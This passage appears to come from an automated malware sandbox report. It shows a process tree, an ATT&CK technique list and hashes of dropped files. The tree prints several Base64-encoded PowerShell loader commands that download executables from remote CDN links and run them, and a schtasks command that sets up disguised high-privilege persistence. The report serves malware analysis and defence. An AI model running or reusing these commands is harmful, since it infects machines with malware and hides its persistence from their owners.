"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
8⤵
PID:3228

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
9⤵
- Creates scheduled task(s)
PID:4532

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
8⤵
PID:4504

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4784

C:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exe
C:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADUANwAzADUAMwAzADMAMwA5ADcANAA4AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAbQBuAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AHoAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAHoAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBxAHcAZQBxAHcAZQB3AHEAZQAuAGUAeABlACcAKQApADwAIwBsAHAAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AGsAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYgBsAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcQB3AGUAcQB3AGUAdwBxAGUALgBlAHgAZQAnACkAPAAjAG0AYgBmACMAPgA="
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Users\Admin\AppData\Roaming\qweqwewqe.exe
"C:\Users\Admin\AppData\Roaming\qweqwewqe.exe"
7⤵
- Executes dropped EXE
PID:3992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 808
8⤵
- Program crash
PID:3816

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\tHdB1QSPrG.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4984

C:\Users\Admin\AppData\Local\Temp\tHdB1QSPrG.exe
C:\Users\Admin\AppData\Local\Temp\tHdB1QSPrG.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADUAOAA3ADcAOAA1ADUAOQAyADkANgAzAC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAawB1AHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAGkAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AHcAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwByAGUAdABlAHIAdABlAGUALgBlAHgAZQAnACkAKQA8ACMAagByAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawBwAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAeABhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHIAZQB0AGUAcgB0AGUAZQAuAGUAeABlACcAKQA8ACMAZgBzAHMAIwA+AA=="
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Users\Admin\AppData\Roaming\retertee.exe
"C:\Users\Admin\AppData\Roaming\retertee.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4044

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\OGd2tdo93o.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2052

C:\Users\Admin\AppData\Local\Temp\OGd2tdo93o.exe
C:\Users\Admin\AppData\Local\Temp\OGd2tdo93o.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdABwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYAMAA4ADgAMAAzADIANAAyADAAMgA0AC8AZABsAHAAYwBkAGkAbABkAG8AbQAuAGUAeABlACcALAAgADwAIwBhAHQAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAcgBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAGEAcwBkAHMAYQAuAGUAeABlACcAKQApADwAIwB2AGQAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBiAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBzAGQAYQBzAGQAcwBhAC4AZQB4AGUAJwApADwAIwB2AHAAeAAjAD4A"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\Dyfpo1N6ED.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4848

C:\Users\Admin\AppData\Local\Temp\Dyfpo1N6ED.exe
C:\Users\Admin\AppData\Local\Temp\Dyfpo1N6ED.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAcwB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADgAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYAMQA3ADQANwA3ADAANwAwADgANQA4AC8ARABlAGYAZQBuAGQAZQByAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACwAIAA8ACMAdgBrAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBuAHoAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAG0AdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHUAaQB5AGkAeQB1AGkALgBlAHgAZQAnACkAKQA8ACMAZABnAG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBzAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAcABoACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdQBpAHkAaQB5AHUAaQAuAGUAeABlACcAKQA8ACMAYgBoAGwAIwA+AA=="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\BVIpn2dy5y.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2128

C:\Users\Admin\AppData\Local\Temp\BVIpn2dy5y.exe
C:\Users\Admin\AppData\Local\Temp\BVIpn2dy5y.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcAB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYAMgA5ADAAMwAyADMAOAA2ADYANAAwAC8AVwBpAG4AZABvAHcAcwBTAGUAaQBzAHMAbwBuAE0AYQBuAGEAZwBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBjAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBsAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAGUAeABlACcAKQApADwAIwBwAG4AdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGgAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwB4AGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAGUAeABlACcAKQA8ACMAZQBnAHoAIwA+AA=="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\yW1Buu2Hbr.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4520

C:\Users\Admin\AppData\Local\Temp\yW1Buu2Hbr.exe
C:\Users\Admin\AppData\Local\Temp\yW1Buu2Hbr.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAdABnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYANQA1ADEAMQAyADUANgAwADcAMQAxAC8AVwBpAG4AZABvAHcAcwBTAGUAaQBzAHMAbwBuAE0AYQBuAGEAZwBlAHIALgBlAHgAZQAnACwAIAA8ACMAagBhAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGgAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAGoAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBlAGUAZQBlAGUAZQBlAGUAZQBlAGUAZQBlAC4AZQB4AGUAJwApACkAPAAjAGIAbABuACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAaQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBlAGUAZQBlAGUAZQBlAGUAZQBlAGUAZQBlAC4AZQB4AGUAJwApADwAIwBjAGEAcgAjAD4A"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3992 -ip 3992
1⤵
PID:2304

C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:1008

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dsffe4vb5.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c0e624cf245f9363d0cc7546d3436f61

SHA1
633c60b7f774ba00dccd0085d8bf0ee4dc669e31

SHA256
daec689334fd19f5449c882be39a49a2c93defbd0890ee7094034dfd7bc339d3

SHA512
d53194b38409ad1cd55f0811d244598c96bd1a4061079b0ca4568d08aed1bdd340e9c216bda1ee94a6a7f68082458ceaedff5303869ffc0bd08cda8f045e641a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c0e624cf245f9363d0cc7546d3436f61

SHA1
633c60b7f774ba00dccd0085d8bf0ee4dc669e31

SHA256
daec689334fd19f5449c882be39a49a2c93defbd0890ee7094034dfd7bc339d3

SHA512
d53194b38409ad1cd55f0811d244598c96bd1a4061079b0ca4568d08aed1bdd340e9c216bda1ee94a6a7f68082458ceaedff5303869ffc0bd08cda8f045e641a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
affb533afd518ad343800a0868062ca7

SHA1
795af694569e97c942fc8184eb31a01ffb2354ad

SHA256
858a2981f5a31384edc5c0a8c3fd24d2bc60a1f4cbb822a6ced7e0e7eaeea0aa

SHA512
6b79dde0e93bfb9ed9ed7287a92b56697f325fc05965121020644b4e5b245861c323c59c1076ff1380b36c61a7f13e53993febba6ddf7700103685b094ec9b00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
33e9dd1bc41e70c4fbdf04b85cf36ff4

SHA1
0433625fae735abc2f11249456e212dfca1473a9

SHA256
f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

SHA512
d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
33e9dd1bc41e70c4fbdf04b85cf36ff4

SHA1
0433625fae735abc2f11249456e212dfca1473a9

SHA256
f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

SHA512
d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
affb533afd518ad343800a0868062ca7

SHA1
795af694569e97c942fc8184eb31a01ffb2354ad

SHA256
858a2981f5a31384edc5c0a8c3fd24d2bc60a1f4cbb822a6ced7e0e7eaeea0aa

SHA512
6b79dde0e93bfb9ed9ed7287a92b56697f325fc05965121020644b4e5b245861c323c59c1076ff1380b36c61a7f13e53993febba6ddf7700103685b094ec9b00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe
Filesize
537KB

MD5
17b4433e4688d03b6908bb235b17371f

SHA1
5571a95725c7b175013c269fcf167ff55008c8e3

SHA256
e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f

SHA512
6ec8f639fd78c41be9dcb1730ae74547147f4cf94bab30e5420ab0aa6796c57232e56d460589a13f591f5ed35591b615081bdfb7eddd267d509d5ce1d705d30e

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe
Filesize
537KB

MD5
17b4433e4688d03b6908bb235b17371f

SHA1
5571a95725c7b175013c269fcf167ff55008c8e3

SHA256
e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f

SHA512
6ec8f639fd78c41be9dcb1730ae74547147f4cf94bab30e5420ab0aa6796c57232e56d460589a13f591f5ed35591b615081bdfb7eddd267d509d5ce1d705d30e

Download Submit
C:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exe
Filesize
6KB

MD5
69fd2890a9b6e2652979cf6fbadb876f

SHA1
7a4827b419c31b560b1a96cc15ad05ef9996e771

SHA256
adee26dc4aef422bfb93a4e6de9d9e359e51639775aabd146fc4226efe5f05ea

SHA512
503b1041cf343f3d08963e19bbc09435fdf1826ae157231aba41c72ce820870734fa070b20137bca4c308cb2abfdec5888abba46a6ea28c5e5e5692a1ac1911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exe
Filesize
6KB

MD5
69fd2890a9b6e2652979cf6fbadb876f

SHA1
7a4827b419c31b560b1a96cc15ad05ef9996e771

SHA256
adee26dc4aef422bfb93a4e6de9d9e359e51639775aabd146fc4226efe5f05ea

SHA512
503b1041cf343f3d08963e19bbc09435fdf1826ae157231aba41c72ce820870734fa070b20137bca4c308cb2abfdec5888abba46a6ea28c5e5e5692a1ac1911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exe
Filesize
6KB

MD5
378deda0d1313deba917adfc74173962

SHA1
cb466cdd64949febdaaae75625d5a3ce0fff6e35

SHA256
d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9

SHA512
c1411ed00aeb88b6f92702132d20dac2efacd90e79aee697e1e0431353638353a5f9fa6b575676e0426f1434cede0f59e58559822cc45067893a30f6b8300281

Download Submit
C:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exe
Filesize
6KB

MD5
378deda0d1313deba917adfc74173962

SHA1
cb466cdd64949febdaaae75625d5a3ce0fff6e35

SHA256
d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9

SHA512
c1411ed00aeb88b6f92702132d20dac2efacd90e79aee697e1e0431353638353a5f9fa6b575676e0426f1434cede0f59e58559822cc45067893a30f6b8300281

Download Submit
C:\Users\Admin\AppData\Local\Temp\BVIpn2dy5y.exe
Filesize
6KB

MD5
9acb87e9bfc6721cadc2b6ddb80be20a

SHA1
c9954ae3e541877fb9ddb1c467d6e20b9eb15db4

SHA256
066ebfdd51a06d63bbd31dd50a91feef08d87d9df1062686e321cda447081ce7

SHA512
ffebd124686f09a478a2aeed7dd3ca2c51460ad2f530d157ef377b62dfd5c5a7dd9d4eaf899fb1aa7f6928ad7cc33a5b3d6113e241150ed3752764a4bf18e657

Download Submit
C:\Users\Admin\AppData\Local\Temp\BVIpn2dy5y.exe
Filesize
6KB

MD5
9acb87e9bfc6721cadc2b6ddb80be20a

SHA1
c9954ae3e541877fb9ddb1c467d6e20b9eb15db4

SHA256
066ebfdd51a06d63bbd31dd50a91feef08d87d9df1062686e321cda447081ce7

SHA512
ffebd124686f09a478a2aeed7dd3ca2c51460ad2f530d157ef377b62dfd5c5a7dd9d4eaf899fb1aa7f6928ad7cc33a5b3d6113e241150ed3752764a4bf18e657

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dyfpo1N6ED.exe
Filesize
6KB

MD5
927455ddb1b992aeccb124f44d2a6662

SHA1
42a3d55b04d0ebe9b55b5e343e97c7eb8513c1a4

SHA256
7c1f6f038401e0a3675b3bda5cbd8828f5b2d1b7663eacd4b8e8c741897d686b

SHA512
9f4679e9cb10fd89840b3ccfb74f0f1d3f176c96b6d3980cf9d39d07494e587227a7161dabda438081d3adc5e9ecd859215155b5e2abb8caa694a68276eeb4c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dyfpo1N6ED.exe
Filesize
6KB

MD5
927455ddb1b992aeccb124f44d2a6662

SHA1
42a3d55b04d0ebe9b55b5e343e97c7eb8513c1a4

SHA256
7c1f6f038401e0a3675b3bda5cbd8828f5b2d1b7663eacd4b8e8c741897d686b

SHA512
9f4679e9cb10fd89840b3ccfb74f0f1d3f176c96b6d3980cf9d39d07494e587227a7161dabda438081d3adc5e9ecd859215155b5e2abb8caa694a68276eeb4c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exe
Filesize
5KB

MD5
a587de0abd290c0cca50352cd98c3f2d

SHA1
da49490c288798293b8d3d00ab4f4fb0f070d08a

SHA256
b8d5709cc3041f63acf07c0643fb753e4940857b96b7d558b43fb9871248936c

SHA512
09ab881b40575a3174ca7141a4a82d6d465f6a96ab2c2a9bf169f895ff9b46327accc3245bb9ea27815c8fd4b7b5787841f553445c3ab48a7160d50f7e1eaba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exe
Filesize
5KB

MD5
a587de0abd290c0cca50352cd98c3f2d

SHA1
da49490c288798293b8d3d00ab4f4fb0f070d08a

SHA256
b8d5709cc3041f63acf07c0643fb753e4940857b96b7d558b43fb9871248936c

SHA512
09ab881b40575a3174ca7141a4a82d6d465f6a96ab2c2a9bf169f895ff9b46327accc3245bb9ea27815c8fd4b7b5787841f553445c3ab48a7160d50f7e1eaba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\OGd2tdo93o.exe
Filesize
5KB

MD5
066725f0d958d14460e6c658abd81666

SHA1
f99bbe5c7fe5f836c56ae03690eb6709d903b1ae

SHA256
24438175b4dc760a6985c738d14ed1639f7fe38d6134dc97160e882d145d14fa

SHA512
bfdf6bc3542e6d2048619f06a78baf4517ed50d2c318f15d090f7c613c514f164feb98bce22d3758095ca27b2f1cbe77e5630970e97684535a36db48d4cf0f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\OGd2tdo93o.exe
Filesize
5KB

MD5
066725f0d958d14460e6c658abd81666

SHA1
